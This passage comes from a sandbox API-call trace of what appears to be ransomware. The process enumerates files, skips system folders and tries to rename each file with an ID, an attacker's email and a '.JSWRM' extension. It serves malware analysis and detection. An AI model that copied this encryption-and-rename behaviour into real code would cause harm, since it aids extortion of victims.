dwReserved1=0x20942e, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2=".") returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="..") returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="...") returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="windows") returned -1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="recovery") returned -1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="perflogs") returned -1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="documents and settings") returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="$RECYCLE.BIN") returned 1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="system volume information") returned -1 [0068.343] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="msocache") returned -1 [0068.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrenclm.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrenclm.dat", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrenclm.dat", lpUsedDefaultChar=0x0) returned 12 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrenclm.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrenclm.dat", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrenclm.dat", lpUsedDefaultChar=0x0) returned 12 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.343] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.344] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655739318684736) returned 0 [0068.344] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.344] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.344] CloseHandle (hObject=0xffffffff) returned 1 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0068.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.344] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.345] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe38781cd, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe38781cd, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x10cb30, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2=".") returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="..") returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="...") returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="windows") returned -1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="recovery") returned -1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="perflogs") returned -1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="documents and settings") returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="$RECYCLE.BIN") returned 1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="system volume information") returned -1 [0068.345] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="msocache") returned -1 [0068.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrlatinlm.dat", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrlatinlm.dat", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrlatinlm.dat", lpUsedDefaultChar=0x0) returned 14 [0068.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrlatinlm.dat", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrlatinlm.dat", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrlatinlm.dat", lpUsedDefaultChar=0x0) returned 14 [0068.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.345] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.345] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.345] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.346] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.346] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.346] CloseHandle (hObject=0xffffffff) returned 1 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0068.346] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.346] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.346] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.346] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.347] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb28b2edf, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb28b2edf, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2662f0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2=".") returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="..") returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="...") returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="windows") returned -1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="recovery") returned -1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="perflogs") returned -1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="documents and settings") returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="$RECYCLE.BIN") returned 1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="system volume information") returned -1 [0068.347] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="msocache") returned -1 [0068.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusalm.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusalm.dat", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusalm.dat", lpUsedDefaultChar=0x0) returned 12 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusalm.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusalm.dat", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusalm.dat", lpUsedDefaultChar=0x0) returned 12 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.347] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.347] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.348] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655155203135336) returned 0 [0068.348] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.348] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.348] CloseHandle (hObject=0xffffffff) returned 1 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0068.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.349] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0068.349] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb281a570, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb281a570, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x339380, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2=".") returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="..") returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="...") returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="windows") returned -1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="recovery") returned -1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="perflogs") returned -1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="documents and settings") returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="$RECYCLE.BIN") returned 1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="system volume information") returned -1 [0068.349] lstrcmpiW (lpString1="hwrusash.dat", lpString2="msocache") returned -1 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusash.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusash.dat", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusash.dat", lpUsedDefaultChar=0x0) returned 12 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusash.dat", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hwrusash.dat", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hwrusash.dat", lpUsedDefaultChar=0x0) returned 12 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0068.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0068.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, 